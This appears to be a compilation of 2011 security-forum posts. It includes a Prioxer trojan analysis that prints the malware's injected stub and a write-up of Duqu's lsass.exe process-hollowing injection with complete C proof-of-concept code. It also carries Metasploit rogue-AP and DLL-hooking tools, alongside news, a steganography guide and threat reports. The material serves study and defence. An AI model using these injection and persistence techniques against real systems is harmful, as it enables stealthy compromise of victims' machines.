Nytro

Wordpress Xss + Internet Explorer 8 Exploit Fri 04 Nov 2011 Description: Wordpress 3.0.3 comment xss. This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 (CVE-2010-3971). Video: http://www.securitytube.net/video/2413 http://www.youtube.com/watch?v=BXmXEKfxZQc&feature=player_embedded#!

Overflow Exploitation, Step By Step Uploaded by DHAtEnclaveForensics on Nov 3, 2011 I previously had this chopped up into pieces that were pretty hard to watch. Now that I'm allowed to have videos longer than 15 minutes, I thought I'd give you the un-cut version! Here's the entire 1 hour talk from beginning to end. Links to the source code for the server being compromised and a blog entry can be found here: Metasploit Exploit Creation, Step By Step | Security, buffer overflow, exploits, Vulnerability, Metasploit, Tutorial | Enclave Forensics For other great short videos, try Auditcasts Durata: 01:04:57 Video: http://www.youtube.com/watch?v=8xonDJe3YxI&feature=youtube_gdata

Malware analysis - Prioxer 05/11/2011 ntroduction An (IRC) friend Horgh told me : "Why not study prioxer, it could be fun ?". But what is prioxer ? It's simply a backdoor Trojan, wich has a dropper with his own parser for NTFS and FAT format. That's why it's fun :], it was a cool way to study approximately how can work NTFS File System. Prioxer First I looked around for finding a sample ( 31 / 42 ) : MD5 : 7e3903944eab7b61b495572baa60fb72 SHA1 : 116930517baab6bdb0829990a43af54d155f5332 SHA256: 06e921abf28c4b260c59d61d84a74c3a5dc12ac99a34110ca5480ce61689385c The thing it will do is to infect the dll "dhcpcsvc.dll" ( we will see after what the purpose of the infection ). NTFS (This is not a tutorial about NTFS, it's just result af all the stuff reversed from prioxer, i wanted to have fun with IDA, and take some challenge by not looking too much documentation or source code like ntfs-3g, so if there is some mistake please refer to your friend google for more about NTFS). But it will not directly open an handle (CreateFile())on this file which is located in "%SYSTEMROOT%/System32/". It will open an handle on your current hard disk driver( like C: ). So here is a schem about how it works : The first thing, we must know on NTFS : all data stored on a volume is contained in file, including data structures used to locate and retrieve files. A NTFS Volume, will start every time, with a data structures, named NTFS Volume Boot Record, she is here for gathering a maximum of information about the volume, like Number Of Sector, or Bytes Per Sector, ... etc ... Then with thoses informations, we can access the MFT (Master File Table) which is the heart of the NTFS, it is implemented as an array of file records. Shel will contain one record, for each file on the volume including a record for the MFT itself. I will not describe all these files, but a special one : Root directory (also known as "\" or "$I30"). This file record contains an index of the files and directories stored in the root of the NTFS directory structure. You have understood that prioxer will use this File Record :]. But ! if you look at my schem, we know Root_Directory is the fifth entry in the array of file_record, and i don't know why they do that but they compute the offset to read this file_record with values found in in $DATA Attributes from MFT, why they don't compute the offset in this simply way : MFT_Addr + sizeof(FILE_ENTRY) * 5. Anyway, it's not important :], we continue your investigation. The thing to know is, that every FILE_RECORD has a list of attributes : (especially those) $DATA (0x80) : Contents of the file. $INDEX_ROOT, $ALLOCATION (0x90 / 0xA0): Implement file name allocation. And a new schem, how the mecanism work (I simplified things): A directory, is simply an index of file names (along with their file references), organized like a b-tree. VCN is Virtual Cluster Numbers, a vnc is a linked value to LCN (Logical Cluster Numbers) wich allow to read, write directly on the hardware disk. So, in your case prioxer will travel the root_directory, look for WINDOWS directory node, then travel "Windows" node, and get "SYSTEM32" node, and get dhcpcsvc.dll. And he is able now to read, write (with ReadFile() and WriteFile() API) directly to VCNs of this file. I will not explain more about NTFS, First I'm not familiar with this FileSystem (new for me), and working almost with IDA took me about 2 ~ 3 evenings to well understand how prioxer work. Next time, I will read some docs :], it will be easier. Ho by the way i wrote some shit for parsing only my root directory : FileSystemName = NTFS [+] Some information about NTFS BPB Sector Size = 512 Sector Per Cluster = 8 Reserved Sectors = 0 Media Descriptor ID = 248 Sector Per Track = 56 Number Of Heads = 255 Hidden Sectors = 56 TotalSectors = 41926023 Starting Cluster Number for the $MFT = 786432 Starting Cluster Number for the $MFTMirror = 2620376 Clusters Per File Record = 246 Clusters Per Index Block = 1 Volume Serial Number = [+] End Information about NTFS BPB + Sector Size = 512 bytes + Cluster Size = 4096 bytes + FileRecord Size = 1024 bytes Size = 0 [+] FILERECORDMAGIC OK + OffsetOfAttr = 38 [+] Information about actual ATTRIBUTE ATTRTYPE = 10 Value Length = 30 CreateTime = 2d458880 [+] Information about actual ATTRIBUTE ATTRTYPE = 30 Value Length = 44 ParentRef = 5 AllocSize = 0 RealSize = 0 [+] Information about actual ATTRIBUTE ATTRTYPE = 50 [+] Information about actual ATTRIBUTE ATTRTYPE = 90 NameLength = 4 NameOffset = 18 Name = $I30 Attrtype = 30 EntryOffset = 10 TotalEntrySize = 28 AllocEntrySize = 28 Flags = 1 FileReference = 0 Size = 18 StreamSize = 0 Flags = 3 -- INDEX ENTRY -- FileReference = 0 Size = 18 StreamSize = 0 Flags = 3 SUB NODE ! GetSubNodeVCN = 0 [+]STREAM OK ... Name : $AttrDef [+]STREAM OK ... Name : $BadClus [+]STREAM OK ... Name : $Bitmap [+]STREAM OK ... Name : $Boot [+]STREAM OK ... Name : $Extend [+]STREAM OK ... Name : $LogFile [+]STREAM OK ... Name : $MFT [+]STREAM OK ... Name : $MFTMirr [+]STREAM OK ... Name : $Secure [+]STREAM OK ... Name : $UpCase [+]STREAM OK ... Name : $Volume [+]STREAM OK ... Name : . [+]STREAM OK ... Name : AUTOEXEC.BAT [+]STREAM OK ... Name : boot.ini [+]STREAM OK ... Name : Bootfont.bin [+]STREAM OK ... Name : CONFIG.SYS [+]STREAM OK ... Name : Documents and Settings [+]STREAM OK ... Name : DOCUME~1 [+]STREAM OK ... Name : IO.SYS [+]STREAM OK ... Name : MSDOS.SYS [+]STREAM OK ... Name : NTDETECT.COM [+]STREAM OK ... Name : ntldr [+]STREAM OK ... Name : pagefile.sys [+]STREAM OK ... Name : Program Files [+]STREAM OK ... Name : PROGRA~1 [+]STREAM OK ... Name : RECYCLER [+]STREAM OK ... Name : System Volume Information [+]STREAM OK ... Name : SYSTEM~1 [+]STREAM OK ... Name : Toolz [+]STREAM OK ... Name : WINDOWS Last Index Entry -- END INDEX ENTRY -- LAST INDEX !!! [+] Information about actual ATTRIBUTE ATTRTYPE = a0 [+] Information about actual ATTRIBUTE ATTR_TYPE = b0 And here is the source code : main.c ReadCluster.c ntfs.h Infection Ok so now we know that prioxer will do some shit with this file, but what !? So prioxer will change the offset value, of "ServiceMain" exported function : And put some code in .text section located at ServiceMain changed offset : .text:7D4EC895 .text:7D4EC895 .text:7D4EC895 public ServiceMain .text:7D4EC895 ServiceMain proc near ; DATA XREF: .text:off_7D4D1FCCo .text:7D4EC895 inc ecx .text:7D4EC896 dec ecx .text:7D4EC897 add eax, 0 .text:7D4EC89A add edi, 0 .text:7D4EC89D or eax, 0 .text:7D4EC8A0 pusha .text:7D4EC8A1 inc edi .text:7D4EC8A2 dec edi .text:7D4EC8A3 push 'll' .text:7D4EC8A8 inc eax .text:7D4EC8A9 dec eax .text:7D4EC8AA push 'd.3i' .text:7D4EC8AF xor ebx, 0 .text:7D4EC8B2 push 'patc' .text:7D4EC8B7 mov edx, edx .text:7D4EC8B9 push esp ; lpLibFileName .text:7D4EC8BA or esi, 0 .text:7D4EC8BD call ds:__imp__LoadLibraryA@4 ; LoadLibraryA(x) .text:7D4EC8C3 xor ebx, 0 .text:7D4EC8C6 pop eax .text:7D4EC8C7 push eax .text:7D4EC8C8 pop eax .text:7D4EC8C9 pop eax .text:7D4EC8CA inc edx .text:7D4EC8CB dec edx .text:7D4EC8CC pop eax .text:7D4EC8CD mov esi, esi .text:7D4EC8CF popa .text:7D4EC8D0 add esi, 0 .text:7D4EC8D3 mov eax, offset _ServiceMain@8 ; ServiceMain(x,x) .text:7D4EC8D8 mov ecx, ecx .text:7D4EC8DA jmp eax .text:7D4EC8DA ServiceMain endp .text:7D4EC8DA .text:7D4EC8DA The snippet of code, will simply load a library with a random name in our case "ctapi3.dll", dropped by prioxer and then jump to the real address of ServiceMain. I will not study this dll (you can find her into ressource, directly), it simply a botnet component that can exchange commands and data over IRC with a command-and-control. Then it write a .bat file, and execute it for deleting the dropper. The only interesting thing was the infection method via a NTFS parser, and infect a windows dll, wihch will be load each time you want to use DHCP. Another interesting fact is a side effect of this technics, you can find a dllcache directory in %SYSTEMROOT%, NTFS maintains it for some often used system files. That's why if you are infected by this trojan, you won't be able to see the difference on dhcpsvc.dll, but a tools like gmer with his own ntfs parser can do it, or if you reboot your computer, you will be able to see it, and your AV too. Conclusion Big thanks to Horgh for the idea of prioxer, what is next target ? Sursa: w4kfu's bl0g

Easy Wireless Honey-Pots using Win7 and Metasploit I found myself inspired by Vivek Ramachandran’s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos. When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this. For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008. If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm. If you’re curious about automating Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc My script gives the end user the option if they want to install the meterpreter service on the victim computer. I thought that giving this option would be ideal for if the victim computer ends up rebooting. If you were just to deploy the soft AP and run a binding payload, the binding payload most likely wouldn’t survive a reboot. The script is available here: http://zitstif.no-ip.org/meterpreter/rogueap.rb http://zitstif.no-ip.org/meterpreter/rogueap.txt If you have any issues and you need help, feel free to contact me. Additionally, don’t hesitate to modify the script if you need/want to do so. via zitstif.no-ip.org Sursa: http://www.securityaegis.com/easy-wireless-honey-pots-using-win7-and-metasploit/

Steganography Made Easy in Linux Published on Friday, 04 November 2011 13:16 1. Introduction Steganography is the art of hiding messages within other messages or data. Most commonly we see this utilized with pictures. This is probably encryption at its finest. Mostly because it doesn't look like usual garbled text that we are used to seeing with encryption. The changes made by Steganography are so slight the human eye cannot perceive them. Even trained cryptographers may have an encoded message inside a picture and be unaware of it. There is a very deep science to this. Usually this is done by flipping parity bits at the binary level. While it is great to learn how this works, sometimes it can be a very tedious job. Fortunately for us there is a tool that will take away most of the grunt work. 2. Legal Disclaimer Before we begin, I should say that I do not condone the knowledge used in this article for anything other than hiding legal information. The purpose of this is to illustrate how to keep secrets safe. I should also note to please research your country's laws on encryption and its exportation before using this tool. No matter how free you believe your country is, you may be shocked to find out how stifling some of the laws on encryption are. 3. Installation SteGUI is a graphical front-end for the program know as Steghide. SteGUI is available for download as an rpm package and a tarball source. One might assume that source would compile flawlessly on Debian an Ubuntu since no deb package is provided. But while trying to compile from source with Debian Sid and Backtrack 5, I found myself in what is commonly known as "dependency hell". To save yourself some trouble and time just download the rpm package. From here you can just issue alien -d SteGUI.rpm to produce a Debian package that installs much easier. From there dpkg -i SteGUI.deb should install without problems. 4. Usage Once you are up and running the GUI is very simple to comprehend. From the File tab select "Open File" to choose a jpg file to use. While any jpg will do, very large messages will require very large pictures to hide them without altering images to the eye. Now that you have a jpg, go to the Actions tab and select "Embed". From here a box will pop up with a couple of requirements and options to fill out. In this example I have entered the path on my computer for a text file named passwd.txt into "File to embed for cover file". This would be the secret text that we wish to hide as it passes along the Internet. Next is the "File to use as cover" line. This is simply the path to the picture we wish to hide the passwd.txt inside. We must also select "File to use as output stegofile". We can name this anything, as long as we include the .jpg file extension. Here I simply chose out.jpg. We are going to leave all the check boxes as the defaults here. I would like to explain what some of these are for though. The encryption box here is rather interesting. There are several decent encryption ciphers offered here in the drop-down menu. Some you may have heard of like the Rijndael cipher, Blowfish, DES, and Triple-DES. While none of these are unbreakable, they're not exactly kid's stuff either. Next is the check box for compression. You might think this is counter-productive. After all too much compression can affect image quality, possibly giving away that the file has been altered. While this is true, what would you think if you found a .jpg that 17MB? Hopefully you would know something is wrong. While that's extreme, it illustrates my point. Compression is used to try and pack a file size back down to the original. The other check boxes should be self-explanatory. Let's look at the pass-phrase down at the bottom here. This is what the recipient of this message will use to open it. Needless to say, the normal rules should apply here as with regular passwords. Nothing in the dictionary, use upper and lower case along with some special characters. You can see from the asterisks in the picture here, I have quite a few characters in this password. I can't stress enough that a good pass-phrase is important. This is what unlocks your encryption and makes the text readable again. Without this, your encryption would be pointless against a brute-force attack. Now it is time for our recipient to open this file. After they open this jpg in SteGUI they simply go to the Actions tab and select “extract”. Another pop-up box will appear to input the necessary files. The input file at the top will simply be the jpg that we have sent them. The output file will be a new file we can name anything. Here I've just made it a file called out.txt. Now that we have our information in a text file we can easily open it for display. # cat out.txt password 5. White Noise While studying computer forensics, steganography came up a lot in my class. My professor had a lot of experience deciphering images while employed with the American FBI and Homeland Security. One day I asked him, "How do you know for sure what you are looking at isn't a false positive?" His answer floored me, "You don't until there's a pattern." So it occurred to me that one could probably gain security by producing a lot of white noise. White noise has many definitions. Especially when it comes to security. If one suspected their home was bugged. You could spend hours blasting annoying music in hopes to confuse or bore to sleep anyone listening in. In this case sending a lot of traffic of unaltered pictures before and after our encoded text. This may give the illusion that your altered jpg is a false positive since the last 24 you sent were clean. 6. Detection Stegdetect is a command-line program for detecting staganography in jpgs. It is also made by the same people who brought you Steghide and SteGUI. Stegdetech looks for algorithms used by other commercal steganography programs like Outguess, Jsteg, Jphide, Camoflage, AppendX and Invisible Secrets. It also offers a sub-program called Stegbreak that will use brute-force to find steganography made by the programs I just mentioned. About the only thing Stegdetect isn't good at doing is finding things made by Steghide! There was no option for searching it algorithms. I took a shot at searching the jpg we made with the parameters set to run all possible tests against it and came up with nothing. # stegdetect -t jopifa out.jpg out.jpg : negative There appears to be no ready built, open source software for finding steganography made by Steghide. At least not without thousands of dollars for proprietary forensics software. For now, cheaply deciphering messages made by Steghide or SteGUI will have to be done the old fashioned way. With a lot of ones and zeros. 7. Conclusion This is probably as easy as steganography will ever get. This program is impressive because it has taken something that used to only be done in binary and brought it down to point and click level. Some may see this dumbing down the art that steganography is. But in an emergency you need a tool that moves fast! Probably even the best binary programmer can't move as quickly as this GUI interface. Armed with speed, stealth, and weapons grade encryption, this open source program is a formidable adversary. Please show your support for the Steghide and SteGUI teams that made this tool possible. Visit our Linux forum if you have some questions in regards to this or any other Linux related topic. Sursa: http://how-to.linuxcareer.com/steganography-made-easy-in-linux

Lookout Mobile Threat Report August 2011 of Contents Highlights Research Methodology Why Mobile Security is Important Mobile OS Security Model Comparison Platform Vulnerabilities and Patch Management Mobile Threats Mobile Malware Trends What’s Next? Tips To Stay Safe About Lookout HIGHLIGHTS oo Both web-based and app-based threats are increasing in prevalence and sophistication. oo Android users are two and a half times as likely to encounter malware today than 6 months ago and three out of ten Android owners are likely to encounter a webbased threat on their device each year. oo An estimated half million to one million people were affected by Android malware in the first half of 2011; Android apps infected with malware went from 80 apps in January to over 400 apps cumulative in June 2011. oo Attackers are deploying a variety of increasingly sophisticated techniques to take control of the phone, personal data, and money. Additionally, malware writers are using new distribution techniques, such as malvertising and upgrade attacks. Download: https://www.mylookout.com/_downloads/lookout-mobile-threat-report-2011.pdf

Doqu - New method of injection 06/11/2011 Introduction I disovered a new method of injection (I don't know if it is really new) in a malware dropped by duqu. So I want to share it with you and as usual write a p0c. Injection Method The malware in question is simply a keylogger, but it uses a nice tricks for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can he do with this address, if we look at PEB struct : >dt nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void It will get the ImageBaseAddress at offset 0x8, by reading it with ReadProcessMemory(). Then it create a section with ZwCreateSection(), then it will in the actual process (not in lsass.exe supended), ZwMapViewOfSection() with argument BaseAdresse equal to ImageBaseAddress of lsass.exe process, then he will do the same operation on lsass.exe process, but wait ! if we read the documentation of ZwMapViewOfSection, we will get a NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES, and the answer is no, because before the second ZwMapViewOfSection, it will perform ZwUn_mapViewOfSection() with BaseAddress equal to ImageBaseAddress on lsass.exe process. And if you wonder : "Wait what !? is it possible ?", and the answer is yes. With this tricks the malware is able to replace ALL the PE image of the suspended process. In my case it will replace entry point with a jmp to an another Section that it created before this tricks inside lsass.exe. p0c So I decided to rewrite this tricks, to well understand the stuff done by the malware ( maybe you will better understand what I explained before ). #include "main.h" int get_entrypoint(char read_proc) { IMAGE_DOS_HEADER idh = NULL; IMAGE_NT_HEADERS inh = NULL; idh = (IMAGE_DOS_HEADER)read_proc; inh = (IMAGE_NT_HEADERS )((BYTE)read_proc + idh->e_lfanew); printf("Entrypoint = %xn", inh->OptionalHeader.AddressOfEntryPoint); return (inh->OptionalHeader.AddressOfEntryPoint); } int main(void) { STARTUPINFO si; PROCESS_INFORMATION pi; char path_lsass[260]; PROCESS_BASIC_INFORMATION pbi; DWORD nb_read; DWORD ImageBase; HANDLE hsect; NTSTATUS stat; PVOID BaseAddress = NULL; PVOID BaseAddress2 = NULL; DWORD eip; memset(&si, 0, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); memset(&pi, 0, sizeof(PROCESS_INFORMATION)); memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION)); ExpandEnvironmentStrings(L"%SystemRoot%\system32\lsass.exe", (LPWSTR)path_lsass, 260); wprintf(L"[+] New Path for lsasse.exe = %sn", path_lsass); if (!CreateProcess((LPWSTR)path_lsass, NULL, NULL, NULL, NULL, CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { printf("[-] CreateProcessW failedn"); printf("LatError = %xn", GetLastError()); return (-1); } ZwQueryInformationProcess = (long (__stdcall )(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwQueryInformationProcess"); ZwMapViewOfSection = (long (__stdcall )(HANDLE,HANDLE,PVOID ,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection"); ZwUn_mapViewOfSection = (long (__stdcall )(HANDLE, PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUn_mapViewOfSection"); ZwCreateSection = (long (__stdcall )(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection"); if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL || ZwUn_mapViewOfSection == NULL || ZwCreateSection == NULL) { printf("[-] GetProcAddress failedn"); return (-1); } if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0) { printf("[-] ZwQueryInformation failedn"); return (-1); } printf("[+] UniqueProcessID = 0x%xn", pbi.UniqueProcessId); if (!ReadProcessMemory(pi.hProcess, (BYTE)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) && nb_read != 4) { printf("[-] ReadProcessMemory failedn"); return (-1); } printf("[+] ImageBase = 0x%xn", ImageBase); char read_proc[0x2000]; if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x2000, &nb_read) && nb_read != 0x2000) { printf("[-] ReadProcessMemory failedn"); return (-1); } printf("(dbg) Two first bytes : %c%cn", read_proc[0], read_proc[1]); eip = get_entrypoint(read_proc); LARGE_INTEGER a; a.HighPart = 0; a.LowPart = 0x8EF2; if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) { printf("[-] ZwCreateSection failedn"); printf("[-] NTSTATUS = %xn", stat); return (-1); } SIZE_T size; size = 0x8000; BaseAddress = 0; BaseAddress = (PVOID)ImageBase; if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare /, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failedn"); printf("[-] NTSTATUS = %xn", stat); return (-1); } ZwUn_mapViewOfSection(pi.hProcess, BaseAddress); if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, NULL, NULL, NULL, &size, 1 / ViewShare /, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failedn"); printf("[-] NTSTATUS = %xn", stat); system("pause"); return (-1); } printf("[+] No more STATUS_CONFLICTING_ADDRESSES, let's insert a int3n"); memset((BYTE)read_proc + eip, 0xCC, 1); memcpy(BaseAddress, read_proc, 0x2000); ResumeThread(pi.hThread); system("pause"); return (0); } And the include file : #include <stdio.h> #include <Windows.h> #if !defined NTSTATUS typedef LONG NTSTATUS; #endif #define STATUS_SUCCESS 0 #if !defined PROCESSINFOCLASS typedef LONG PROCESSINFOCLASS; #endif #if !defined PPEB typedef struct _PEB *PPEB; #endif #if !defined PROCESS_BASIC_INFORMATION typedef struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION; #endif; typedef LONG NTSTATUS, *PNTSTATUS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); NTSTATUS (__stdcall *ZwQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength OPTIONAL ); NTSTATUS (__stdcall *ZwCreateSection)( PHANDLE SectionHandle, ACCESS_MASK DesiredAccess, PDWORD ObjectAttributes OPTIONAL, PLARGE_INTEGER MaximumSize OPTIONAL, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle OPTIONAL ); NTSTATUS (__stdcall *ZwMapViewOfSection) ( HANDLE SectionHandle, HANDLE ProcessHandle, OUT PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect ); NTSTATUS (__stdcall *ZwUn_mapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ); So for the p0c i just put a INT3 at entry point of lsass.exe, and here the result : Conclusion This method is really fun because it don't use SetThreadContext(), for updating eip before resuming thread execution. Sursa: http://blog.w4kfu.com/post/new_method_of_injection IMPORTANT: Am inlocuit ZwUn mapViewOfSection cu ZwUn_mapViewOfSection (pentru ca nu puteam posta altfel, thanks Zatarra) Vedeti sursa.

Download Firefox 8 Final for Linux November 6th, 2011, 09:50 GMT - By Marius Nestor Dear readers, a few minutes ago Mozilla unleashed the stable version of the highly anticipated Mozilla Firefox 8.0 web browser for Linux, Windows and Macintosh operating systems. Yes, we're talking about the final version of Firefox 8, which is aready available for download on the official FTP site of the Mozilla company. Mozilla Firefox 8.0 brings new features, as well as performance and stability enhancements. Here are some of the most important ones: - Implemented Twitter search; - Tabs can now be loaded on demand, greatly improving start-up time; - Implemented an one-time add-on selection dialog to easily manage your installed extensions; - HTML5 context menus support; - Better memory performance; - Third party add-on are now disabled by default; - insertAdjacentHTML support; - Better CSS hyphen support; - Better WebSocket support; - CORS support. Mozilla Firefox 8.0 is supported on both 32-bit and 64-bit architectures, which means that it will run on any Linux distribution. Canonical will also update their supported Ubuntu releases to Firefox 8 via the official channels, just update your systems in a few days. Until then, download Mozilla Firefox 8 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons! Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-4-20864.shtml Versiunea 9.0.a2 Aurora: http://www.mozilla.org/en-US/firefox/aurora/ Sursa: http://news.softpedia.com/news/Download-Firefox-8-Final-for-Linux-232587.shtml

VanishCrypt – Virtual Encryption Tool by SecurityLabs SecurityLabs Experts from India release a new Virtual Encryption Tool called "VanishCrypt". A Freeware Utility to Secure Your Data. It creates a virtual disk that contains your secret files. Data is protected with a Encrypted Password. The files are completely inaccessible without the correct password. Stored files are encrypted with strong CryptoAPI. Additional Features: It have "Advanced Mode" with you can create a real virtual drive accessible in Explorer that contains your files stored in the vdisk image. It uses Win32 API for I/O operations for a great speed improvements Video: http://www.youtube.com/watch?feature=player_embedded&v=Kj0TSkYrI0g#! Download: http://code.google.com/p/vanishcrypt/downloads/detail?name=Vanish%20Crypt.rar&can=2&q=#makechanges Via: http://www.securitylabs.in/2011/11/vanishcrypt-virtual-encryption-tool.html Sursa: http://thehackernews.com/2011/11/vanishcrypt-virtual-encryption-tool-by.html

Social Engineering Capture the Flag Results defcon@social-*engineer.org Written by: Christopher J. Hadnagy & James O’Gorman Researchers: Dan Sharp & Eric Maxwell Table of Contents Executive Summary .................................................................................................................................................3 Primary Findings..................................................................................................................................................4 Background and History of CTF Event .............................................................................................................5 Flags................................................................................................................................................................................5 Results and Analysis................................................................................................................................................7 Companies Called.................................................................................................................................................7 Target Ranking......................................................................................................................................................8 Dossiers................................................................................................................................................................. 10 Information Sources.....................................................................................................................10 Calls......................................................................................................................................................................... 17 Targeted Employees.....................................................................................................................17 Pretexts Used..................................................................................................................................17 Defenses............................................................................................................................................19 Industries Targeted .............................................................................................................................................. 22 Corporate Security Spending....................................................................................................................... 25 Conclusion and Recommendations................................................................................................................ 28 About Social-*?Engineer.org& Social-*?Engineer.Com................................................................................... 30 Sponsors .................................................................................................................................................................... 32 Download: http://www.social-engineer.com/downloads/Social-Engineer_Defcon_19_SECTF_Results_Report.pdf

Japanese supercomputer blisters 10 quadrillion calculations per second By Layer 8 on Fri, 11/04/11 - 12:54pm. “K” supercomputer builds on Top 500 fastest supercomputer rankings lead The Japanese supercomputer ranked #1 on the Top 500 fastest supercomputers broke its own record this week by hitting 10 quadrillion calculations per second (10.51 petaflops), according to its operators, Fujitsu and Riken. The supercomputer "K" consists of 864 racks, comprising a total of 88,128 interconnected CPUs and has a theoretical calculation speed of 11.28 petaflops, the companies said. When the LINPACK benchmark program measured the K computer in its final configuration, the supercomputer system achieved a speed of 10.51 petaflops exceeding its previous speed of 8.162 petaflops, which had placed the system in first place on the TOP500 supercomputer list published June 2011, the companies said. So what kind of applications is such a monster machine good for? Fujitsu and Riken listed the following: Analyzing the behavior of nanomaterials through simulations and contributing to the early development of such next-generation semiconductor materials, particularly nanowires and carbon nanotubes, that are expected to lead to future fast-response, low-power devices. Predicting which compounds, from among a massive number of drug candidate molecules, will prevent illnesses by binding with active regions on the proteins that cause illnesses, as a way to reduce drug development times and costs (pharmaceutical applications). Simulating the actions of atoms and electrons in dye-sensitized solar cells to contribute to the development of solar cells with higher energy-conversion efficiency. Simulating seismic wave propagation, strong motion, and tsunamis to predict the effects they will have on human-made structures; predicting the extent of earthquake-impact zones for disaster prevention purposes; and contributing to the design of quake-resistant structures. Conducting high-resolution (400-m) simulations of atmospheric circulation models to provide detailed predictions of weather phenomena that elucidate localized effects, such as cloudbursts. Riken and Fujitsu have been developing the K computer, as part of Japan's Ministry of Education, Culture, Sports, Science and Technology a High-Performance Computing Infrastructure program. Sursa: http://m.networkworld.com/community/blog/japanese-supercomputer-blisters-10-quadrillio Oare sunt singurul care se gandeste ca cea mai buna utilitate a sa ar fi crack-uirea md5-urilor?

DLL Injection Framework Update: I’ve left this up for posterity, but unless you have a good reason not to, you should be using Microsoft Detours for this stuff. It’s just as easy to use and far more mature. Code injection is messy. Hooking via JMP patching is even messier. So I’ve tried to clean things up as much as possible by putting the heavy-lifting in a C++ class. You can get a rough idea of the exposed functionality from the class’s public function list: bool CallThreadProc(const char* thread_proc_name, void* parameter, DWORD timeout_ms, DWORD &exit_code); static DWORD GetProcessIDFromWindow(const char* class_name, const char* window_name); void* GetRemoteProcAddress(const char* proc_name); void* GetRemoteProcAddress(const char* proc_name, const char* module_path); HMODULE GetRemoteModuleHandle(HMODULE local_handle); HMODULE InjectDLL(DWORD process_id); HDLLHOOK InstallDLLHook(const char* existing_module_path, const char* existing_function_name, const char* hook_function_name); HDLLHOOK InstallCodeHook(void* existing_function_address, const char* hook_function_name); bool RemoveAllHooks(); bool RemoveHook(HDLLHOOK handle); void RemoveDLL(); I provide no documentation beyond the brief descriptions given in the header and this following example. It should all be sufficiently self-explanatory though. This snippet injects a DLL into Windows Calculator, which is assumed to be running, then installs two hooks (one by name and another by address) from the user-supplied HookDLL. // Create the injection object DLLInjection injection("E:/Temp/HookDLL.dll"); // Find Calc.exe by its window DWORD process_id = injection.GetProcessIDFromWindow("SciCalc", "Calculator"); // Inject the DLL HMODULE remote_module = injection.InjectDLL(process_id); // Hook a DLL function (User32!SetWindowTextW) HDLLHOOK swtw_hook = injection.InstallDLLHook("C:/Windows/System32/User32.dll", "SetWindowTextW", "SetWindowTextHookW"); // Hook a function manually (Calc!0100F3CF) HDLLHOOK manual_hook = injection.InstallCodeHook(reinterpret_cast<void*> (0x0100F3CF), "SomeOtherHook"); // Remove the hooks 